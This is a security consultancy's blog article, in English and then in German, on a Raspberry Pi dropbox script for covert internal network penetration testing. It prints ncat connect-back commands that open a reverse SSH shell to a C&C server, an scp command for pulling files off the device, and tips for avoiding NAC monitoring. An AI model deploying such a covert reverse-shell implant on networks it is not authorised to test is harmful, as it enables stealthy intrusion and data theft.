Raspberry Pi Remote Access - Stealthy Approach to Internal Network Penetration Testing

Raspberry Pi Remote Access

Stealthy Approach to Internal Network Penetration Testing

Ahmet Hrnjadovic
by Ahmet Hrnjadovic
on September 05, 2019
time to read: 12 minutes

Keypoints

How to use Raspberry Pi for stealthy Remote Access

  • A Raspberry Pi with a broadband connection can be deployed for stealthy internal network penetration testing
  • The Communication Channel can be secured using SSH
  • Encrypted containers should be used to secure data on the Raspberry Pi
  • Ensuring data integrity remains an issue on a partially unencrypted, unsupervised device

Too often have we heard adventurous stories of internal network penetration testers having to hide somewhere in their target environment. Sometimes after work hours, maybe in a dark meeting room, in constant danger of being discovered with just the promise of the treasures from the network port driving them forward. In this day and age it should not have to be this way. The word of novel technological advancements is muttered on the streets. You hear of small mobile computing devices. Mobile broadband internet, they say.

The script phone_home.sh presented in this article is intended to be run on a device such as a Raspberry Pi. Its job is to reliably establish and maintain a communication channel for the Penetration Tester to access the device. The script can be found on our GitHub page.

Functionalities

In its default configuration the script will try to use an active UMTS device to phone home, such as the Huawei e3372 LTE stick which we used for testing. In a first step, the script starts a wireless hotspot using hostapd. So even if phoning home over a broadband connection fails, the Raspberry Pi can still be accessed as long as it’s possible to work in its vicinity.

Next, the script checks if any interface to phone home on is available. To prevent the script from phoning home on an interface which may be NAC-restricted or otherwise monitored, only interfaces with whitelisted MAC addresses are used. If no whitelisted interface is found or a whitelisted interface is lost, the script checks for a new interface every 5 seconds. This allows for flexible hotplugging of whitelisted devices after the Raspberry Pi is already deployed and script execution has begun. After an interface is found, the script currently configures it with dhclient. With active UMTS devices such as the Huawei e3372 or even wireless ones such as the Huawei E5577 which run their own DHCP server and do NAT, this is the desired procedure.

To make the script flexible, the interface configuration, like other tasks, is contained in its own function conf_iface which can be easily swapped out in the main routine.

In a next step the script adds static routes for all configured hosts to phone home to. These home locations are also whitelisted in the iptables OUTPUT chain of the filter table to prevent the pentester from being locked out when using the NAC bypass script. Finally, the script tries to connect to each configured home location.

The control channel is designed to use SSH, for both the big security and usability benefits it offers over other mechanisms. One problem encountered is that the home location cannot connect to the Raspberry Pi on demand first because many commercial active UMTS devices use NAT. At first it appeared the only way to serve an SSH shell in a host behind NAT is by remote port forwarding. This would require the Raspberry Pi to first SSH into the home location, and then forward the remote port. This is not a viable solution because the Raspberry Pi is deployed unsupervised in a potentially hostile environment. An individual could find the Raspberry Pi and use the private keys present on the device to ssh into the C&C server, which would be catastrophic.

Here, SSH’s ProxyCommand option comes into play. The ProxyCommand directive can take anything that reads SSH data from its stdin and writes returning data to its stdout. So as long as the data reaches an SSH server somewhere on the other end, an SSH connection should be possible. The script attempts to connect to the home location with the following command:

ncat $_host $_port --wait 10 --sh-exec "ncat 127.0.0.1 $SSHD_PORT"

We can receive the connection with this command on the C&C server:

ssh -o "ProxyCommand ncat -vlp <port>" <user>@localhost

SSH isn’t involved in establishing the TCP connection with the remote host so we can just supply it localhost. Once the ncat instance on the Raspberry Pi connects to the ncat listener on the C&C server, it executes another ncat instance which connects to the local SSH server to which it forwards all traffic data. Now all SSH traffic is tunneled through our TCP connection and we have a reverse SSH shell from an untrusted device (the Raspberry Pi) through NAT with no need for private keys on the Raspberry Pi.

The script checks all configured home locations every 60 seconds and connects to the first one which is available. To do this it only sends a TCP SYN without completing the handshake to avoid closing the remote listener:

[[ -n $(hping3 --syn -c 3 $_host -p $_port | grep -m 1 -io "flags=SA") ]] &&
ncat $_host $_port --wait 10 --sh-exec "ncat 127.0.0.1 $SSHD_PORT"

Another functionality is the monitoring of USB devices. When an unexpected USB device is detected, the Raspberry Pi shuts down. This is a rudimentary security feature that is rather more designed to prevent low threats from poking around inside the device if they find it. Nothing prevents anyone from taking out the Raspberry Pi’s SD card and examining its contents on another device. This functionality may be removed again at a later point because the shutting down of the device may be an inconvenience to the penetration tester and not be worth the non-existent security benefit it offers. This feature is not activated by default.

Throughout the script checks and retries are implemented to add resilience against seemingly random failures encountered during testing such as UMTS stick registration failures or dropped packets due to the UMTS stick suspending after short periods of inactivity.

Usage

The script takes no command line arguments because it is designed to be run at boot. There is a companion script prep.sh which can be run on Debian-based systems to install the necessary packages from the repos and write configuration files for hostapd and udhcpd (Busybox version of DHCP server for ARM devices). This should only have to be run once during device setup.

Variables in a configuration file can be modified to configure the scripts behavior. The configuration file is just a list of bash-syntax variable definitions which are imported at runtime. The configuration is imported by both phone_home.sh and prep.sh and eliminates the need for changing identical variables in both scripts.

For a minimal setup of the phone_home.sh script, following variables should be set:

To enable the wireless hotspot as a fallback, set DISABLE_HOTSPOT to 0 and set the WIRELESS_IFACE variable to the name of your wireless interface.

To use the simple USB monitoring feature, just plug in the USB devices that are supposed to be whitelisted and paste the full output of lsusb into the GOOD_USB variable. Set USB_DEBUG to 1 for testing.

To pull files off the device, scp can be used with the same method as with ssh.

scp -o "ProxyCommand ncat -vlp <port>" <user>@localhost:/<remote_source>/ /<local_target>

Again, the script tries to connect to every configured C&C host and port combination configured in 60 second intervals. If an existing SSH session is active, the script pauses connection retries. In this case, the same command as in the script can be called manually:

ncat -v <ip> <port> --sh-exec "ncat 127.0.0.1 <SSHD_PORT>"

During testing with the Huawei e3372 the established SSH sessions froze after a few minutes of inactivity due to the UMTS stick suspending. The stick cannot be woken up with external traffic. Thus, the SSH session cannot be reactivated once the stick is suspended. To avoid this, the ServerAliveInterval option can be used with ssh to act as a keepalive:

ssh -o "ProxyCommand ncat -vlp <port>" -o "ServerAliveInterval 20" <user>@localhost

This example sends a message through the encrypted channel to request a response from SSH ssh server after no data has been received for 20 seconds, fitting our need perfectly. After closing the SSH session, the script will continue to check for open listeners every 60 seconds.

Security Considerations

Deploying an unsupervised device comes with its own risks and challenges. First, the Raspberry Pi cannot be encrypted because it has to be able to boot autonomously. Luckily we managed to not store any private keys on the device. To store any sensitive data, an encrypted volume should be used after SSH’ing into the Raspberry Pi.

Allocate some space to a file and format it as an encrypted volume:

$ fallocate -l 5G crypted
# cryptsetup luksFormat crypted

Open it and mount it somewhere, for example your home directory:

# cryptsetup luksOpen crypted crypthome
# mount /dev/mapper/crypthome /<homedir>/

This can be accomplished easily by running a simple script located in the user’s home directory:

#!/bin/bash

cryptsetup luksOpen /root/crypted crypthome
mount -o rw,nodelalloc /dev/mapper/crypthome $HOME
exec bash

This assumes the encrypted volume is /root/crypted. One should keep in mind that everything outside the encrypted volume cannot be trusted strictly speaking. Especially after events such as a long shutdown of the Raspberry Pi, where the SD card could have been removed and its contents modified.

Even contents of the encrypted volume cannot be trusted, since they can be modified just the same after opening the volume if the rest of the system is compromised. To minimize the risk of the compromise affecting devices other than the Raspberry Pi, SSH agent forwarding should be disabled. SSH agent forwarding is useful because it allows for host 0 to SSH into host 1, and then continue to SSH into host 2 from host 1. Host 2’s authentication request is forwarded through host 1 back to host 0. The authentication succeeds seamlessly depending on the agent used. If the Raspberry Pi is compromised, agent forwarding can be abused to SSH into any host which has your public keys configured.

Next Steps

To minimize downtime of another Device which previously occupied a network port, traffic to one interface should automatically be forwarded to the second interface. This assumes we have 3 interfaces, 2 of which are not associated with the Control Channel to the C&C Server.

About the Author

Ahmet Hrnjadovic

Ahmet Hrnjadovic is working in cybersecurity since 2017. There he is focused in topics like Linux, secure development and web application security testing. (ORCID 0000-0003-1320-8655)

Links

You want to test the security of your firewall?

Our experts will get in contact with you!

×
Monero

Monero

Ahmet Hrnjadovic

Attacks against Miracast

Attacks against Miracast

Ahmet Hrnjadovic

SSLv3 Attacks

SSLv3 Attacks

Ahmet Hrnjadovic

Third-Party Cookies

Third-Party Cookies

Ahmet Hrnjadovic

You want more?

Further articles available here

You need support in such a project?

Our experts will get in contact with you!

You want more?

Further articles available here

Raspberry Pi Remote Access - Remote-Access Script für mobile Pentesting Plattformen

Raspberry Pi Remote Access

Remote-Access Script für mobile Pentesting Plattformen

Ahmet Hrnjadovic
von Ahmet Hrnjadovic
am 05. September 2019
Lesezeit: 12 Minuten

Keypoints

So nutzen Sie einen Raspberry Pi für internes Pentesting

  • Ein Raspberry Pi mit einer mobilen Internet Anbindung kann für unscheinbares internes Netzwerk Penetration Testing verwendet werden
  • Der Kommunikationskanal kann mit SSH gesichert werden
  • Verschluesselte Container sollten für die lokale Datensicherung verwendet werden
  • Die Gewährleistung der Datenintegrität verbleibt ein Problem auf einem Teilweise unverschlüsselten, unbeaufsichtigten Gerät

Mit Klein-Computern wie dem Raspberry Pi und mobilem Internet kann eine kompakte mobile Plattform geschaffen werden, die bei internen Netzwerk Penetration Tests in der Zielumgebung an das Netzwerk angeschlossen werden kann wonach keine Besuche in Person mehr nötig sind.

Das in diesem Artikel präsentierte Script soll einen sicheren Kommunikationskanal zum Raspberry Pi zuverlässig zur Verfügung stellen und aufrechterhalten. Dieses kann von unserem GitHub Repository bezogen werden.

Funktionalität

In der Default-Konfiguration versucht das Script phone_home.sh ein aktives UMTS-Device zu verwenden, um sich mit dem C&C Server zu verbinden, wie dem Huawei e3372 LTE Stick, welchen wir zum Testen verwendet haben. In einem ersten Schritt startet das Script einen WLAN-Hotspot mit hostapd. Damit kann auch auf das Raspberry Pi zugegriffen werden, wenn die mobile Verbindung fehlschlägt, sofern es möglich ist in der Umgebung um das Raspberry Pi herum zu arbeiten. Als nächstes sucht das Script nach passenden Interfaces, die es verwenden kann, um sich mit dem C&C Server zu verbinden. Um zu verhindern, dass das Script ein Interface verwendet, welches an einem NAC-kontrollierten oder anderweitig überwachten Netzwerkport angeschlossen ist, verwendet das Script nur Interfaces, deren MAC-Adressen in einer vorkonfigurierten Whitelist enthalten sind. Wenn kein passendes Interface gefunden wird oder ein verwendetes Interface verloren geht, kontrolliert das Script alle 5 Sekunden, ob neue Interfaces verfügbar sind. Das erlaubt flexibles Hotplugging von Interfaces, welche in der Whitelist enthalten sind, nachdem das Raspberry Pi bereits in der Zielumgebung aufgesetzt ist.

Nachdem ein Interface gefunden wurde, konfiguriert das Script es mit dhclient. Bei aktiven UMTS-Devices, wie dem Huawei e3372, oder auch drahtlosen Geräten, wie dem Huawei e5577, welche ein eigenes lokales Netzwerk etablieren, einen eigenen DHCP-Server laufen und NAT betreiben, ist das der gewünschte Ansatz. Um das Script für verschiedene Geräte und Anforderungen flexibel zu halten, sind die Interface-Konfiguration und andere Tasks jeweils in ihrer eigenen Funktion enthalten, die bei Bedarf in der Main-Routine ausgetauscht werden können.

In einem nächsten Schritt fügt das Script statische Routen für alle konfigurierten C&C Server hinzu. Diese Hosts werden auch in der Iptables OUTPUT-Chain der Filter-Table explizit erlaubt, um zu verhindern, dass sich der Pentester über das Netzwerk aussperrt, wenn er zum Beispiel in einem nächsten Schritt das NAC-Bypass Script verwendet. Danach versucht das Script sich mit jedem konfigurierten C&C Server zu verbinden.

Der Kommunikationskanal verwendet SSH für die grossen Sicherheits- und Usability-Vorteile, die es im Vergleich zu anderen Methoden bietet. Ein angetroffenes Problem ist, dass der Grossteil der komerziell verfügbaren UMTS-Geräte NAT betreiben, womit es für die C&C Server nicht möglich ist, eine Verbindung zum Raspberry Pi aufzubauen. Zuerst schien es so, als wäre Remote-Port-Forwarding die einzige Möglichkeit an eine SSH-Shell von einem Gerät hinter NAT zu kommen. Das würde erfordern, dass das Raspberry Pi zuerst eine SSH-Verbindung zum C&C Server aufbaut, um den Remote-Port zu forwarden. Das ist in diesem Fall kein verwendbarer Ansatz, weil das Raspberry Pi unbeaufsichtigt in einer potentiell feindlichen Umgebung aufgestellt sein kann. Jede Person, welche das Raspberry-Pi findet, kann mit den Private-Keys auf dem Gerät ebenfalls eine SSH-Session auf dem C&C Server bekommen. Hier kommt SSH’s ProxyCommand Option ins Spiel. Die ProxyCommand-Direktive nimmt irgendeinen Befehl, welcher von seinem STDIN liest und zurückgeschickte Daten auf STDOUT ausgibt. Solange die Daten den SSH-Server irgendwo am anderen Ende erreichen, sollte eine SSH-Verbindung aufgebaut werden können. Das Script versucht mit folgendem Befehl eine Verbindung zu einem C&C Server aufzubauen:

ncat $_host $_port --wait 10 --sh-exec "ncat 127.0.0.1 $SSHD_PORT"

Wir können die Verbindung mit folgendem Befehl auf dem C&C Server empfangen:

ssh -o "ProxyCommand ncat -vlp <port>" <user>@localhost

SSH ist nicht in der Herstellung der TCP-Verbindung mit dem Raspberry Pi involviert, weshalb wir jeweils localhost als Host angeben können. Sobald sich die ncat Instanz auf dem Raspberry Pi mit dem C&C Server verbunden hat, führt sie eine weitere ncat Instanz aus, die sich mit dem lokalen SSH-Server verbindet und zu welcher sie alle erhaltenen Daten weitergibt. Jetzt wird der ganze SSH-Traffic über diese TCP-Verbindung geschickt und wir haben eine reverse SSH-Shell von einem unvertrauten Host, dem Raspberry Pi, durch das NAT funktioniert, ohne dass wir Private-Keys auf dem Raspberry Pi halten.

Das Script kontrolliert die konfigurierten C&C Server alle 60 Sekunden und verbindet sich mit dem ersten welcher verfügbar ist. Dafür verschickt es jeweils nur einen TCP SYN ohne den Handshake zu vollenden, damit der Listener auf dem C&C Server nicht geschlossen wird:

[[ -n $(hping3 --syn -c 3 $_host -p $_port | grep -m 1 -io "flags=SA") ]] &&
ncat $_host $_port --wait 10 --sh-exec "ncat 127.0.0.1 $SSHD_PORT"

Eine Weitere Funktionalität ist das Monitoren von USB-Geräten. Wenn ein unerwartetes USB-Gerät erkannt wird, fährt das Raspberry Pi herunter. Das ist ein rudimentäres Sicherheits-Feature, das dazu gedacht ist, geringere Bedrohungen davon abzuhalten, das Gerät zu proben. Nichts hält einen Finder davon ab, die SD-Karte des Raspberry Pis zu entfernen und die Inhalte auf einem anderen Gerät zu analysieren. Diese Funktionalität könnte zu einem späteren Zeitpunkt entfernt werden, da ein herunterfahren des Geräts unpraktisch ist für den Penetration Tester und die sehr marginale Sicherheitsleistung nicht wert ist. Dieses Feature ist per Default nicht aktiv.

Über das Script hinweg sind mehrere Kontrollen und Wiederholversuche implementiert, um höhere Stabilität und Widerstandsfähigkeit gegenüber scheinbar zufälligen Fehlern entgegenzuwirken, welche beim Testen aufgekommen sind. Dazu gehören Fehlschläge beim Registrieren des UMTS-Sticks oder vom Stick verworfene Pakete, weil er nach kurzer Zeit der Inaktivität in einen Ruhezustand geht.

Verwendung

Das Script nimmt keine Command-Line-Argumente an, weil es gedacht ist beim Boot zu laufen. Es gibt ein zugehöriges Script prep.sh, welches auf Debian-basierten Systemen laufen gelassen werden kann, um die nötigen Programme von den Repos zu installieren und Konfigurationsdateien für hostapd und udhcpd (Busybox Version eines DHCP-Servers für Geräte mit ARM-Architektur). Dieses sollte nur einmal laufen müssen, um das Gerät vorzubereiten.

Variablen in einer Konfigurationsdatei können modifiziert werden, um das Verhalten des Scripts anzupassen. Die Konfigurationsdatei ist eine Liste an Variable-Definitionen im Bash-Syntax, die zur Laufzeit importiert werden. Die Konfiguration wird von phone_home.sh und prep.sh importiert und verhindert, dass gleiche Variablen in beiden Scripts angepasst werden müssen.

Für eine minimale Konfiguration sollten folgende Variablen angepasst werden:

Um den WLAN-Hotspot als Fallback zu aktivieren, sollte DISABLE_HOTSPOT auf 0 und WIRELESS_IFACE auf den Namen des WLAN-Interface gesetzt werden.

Um das grundlegende USB-Monitoring “Feature” zu verwenden, können alle USB-Devices eingesteckt und der Output von lsusb in die GOOD_USB Config-Variable gesetzt werden. USB_DEBUG kann zum Testen auf 1 gesetzt werden.

Um Dateien vom Raspberry Pi abzuziehen, kann scp auf dieselbe Art wie SSH verwendet werden:

scp -o "ProxyCommand ncat -vlp <port>" <user>@localhost:/<remote_source>/ /<local_target>

Das Script versucht alle 60 Sekunden eine Verbindung mit den konfigurierten C&C Servern aufzubauen. Wenn eine SSH-Session bereits aktiv ist, pausiert das Script weitere Verbindungsversuche. In diesem Fall kann der selbe Befehl der auch im Script verwendet wird, manuell aufgerufen werden:

ncat -v <ip> <port> --sh-exec "ncat 127.0.0.1 <SSHD_PORT>"

Während dem Testen mit dem Huawei e3372 Stick sind nach wenigen Minuten der Inaktivität gewisse Verbindungen eingefroren, da der UMTS-Stick in den Ruhezustand geht. Der Stick kann nicht mit externem Netzwerkverkehr aufgeweckt werden, wodurch die SSH-Session nicht reaktiviert werden kann. Um das zu verhindern, kann die ServerAliveInterval Option mit SSH verwendet werden, um als Keep-Alive zu fungieren:

ssh -o "ProxyCommand ncat -vlp <port>" -o "ServerAliveInterval 20" <user>@localhost

Dieses Beispiel fragt vom SSH-Server eine Antwort ab, wenn 20 Sekunden lang keine Daten empfangen wurden. Nach dem Beenden der SSH-Session geht das Script wieder dazu über, alle 60 Sekunden lang die konfigurierten C&C Server nach offenen Listenern zu scannen.

Sicherheitsbedenken

Das Aufstellen eines unbeaufsichtigten Geräts kommt mit eigenen Risiken und Herausforderungen. Das Raspberry Pi kann nicht vollständig verschlüsselt werden, weil es in der Lage sein muss, autonom hochzufahren. Glücklicherweise konnten wir vermeiden, Private-Keys auf dem Device zu abzulegen. Um sensitive Daten zu speichern, sollte ein verschlüsselter Container verwendet werden, welcher geöffnet werden kann, nachdem man sich mit dem Raspberry Pi verbindet.

Dafür kann einer Datei ein wenig Speicherplatz zugeordnet und diese formatiert werden:

$ fallocate -l 5G crypted
# cryptsetup luksFormat crypted

Danach kann es geöffnet und gemountet werden, zum Beispiel im Home-Verzeichnis des Benutzers:

# cryptsetup luksOpen crypted crypthome
# mount /dev/mapper/crypthome /<homedir>/

Es sollte bedacht werden, dass die Integrität der Inhalte ausserhalb des verschlüsselten Containers nicht gewährleistet ist. Besonders nach einem langen Shutdown des Raspberry Pis, bei dem die SD-Karte entfernt und dessen Inhalt manipuliert werden konnte. Damit kann auch die Vertraulichkeit und Integrität der Inhalte des verschlüsselten Containers nicht gewährleistet werden, da die Inhalte nach dem öffnen ebenfalls ausgelesen und manipuliert werden können, wenn das System kompromittiert ist.

Um das Schadenspotential im Falle einer Kompromittierung zu minimieren, sollte SSH Agent Forwarding deaktiviert werden. SSH Agent Forwarding ist nützlich, weil es erlaubt, von Host 0 zu Host 1 zu SSHen und dann von Host 1 weiter zu Host 2. Der Authentication Request von Host 2 wird über Host 1 an Host 0 weitergeleitet. Je nach verwendetem Agent geschieht die Authentisierung leise ohne Einwirkung des Benutzers auf Host 0. Wenn das Raspberry Pi kompromittiert ist, kann Agent Forwarding missbraucht werden, um in beliebige Hosts zu SSHen die mit dem Public-Key des Benutzers konfiguriert sind.

Weitere Schritte

Um die Downtime eines zuvor am verwendeten Netzwerkport angeschlossenen Geräts zu minimieren, sollte der Netzwerkverkehr an einem Netzwerkport automatisch an den anderen Netzwerkport weitergeleitet werden. Hier wird angenommen, dass das Raspberry Pi 3 Interfaces hat, von denen 2 nicht mit dem Control-Channel zum C&C Server assoziiert sind.

Über den Autor

Ahmet Hrnjadovic

Ahmet Hrnjadovic arbeitet seit dem Jahr 2017 im Bereich Cybersecurity, wobei er sich auf die Bereiche Linux, sichere Programmierung und Web Application Security Testing fokussiert. (ORCID 0000-0003-1320-8655)

Links

Sie wollen die Sicherheit Ihrer Firewall prüfen?

Unsere Spezialisten kontaktieren Sie gern!

×
Crypto-Malware

Crypto-Malware

Ahmet Hrnjadovic

SAML 2.0, OPenID Connect, OAuth 2.0

SAML 2.0, OPenID Connect, OAuth 2.0

Ahmet Hrnjadovic

Linux Bind-Shell in Assembler

Linux Bind-Shell in Assembler

Ahmet Hrnjadovic

Sie wollen mehr?

Weitere Artikel im Archiv

Sie brauchen Unterstützung bei einem solchen Projekt?

Unsere Spezialisten kontaktieren Sie gern!

Sie wollen mehr?

Weitere Artikel im Archiv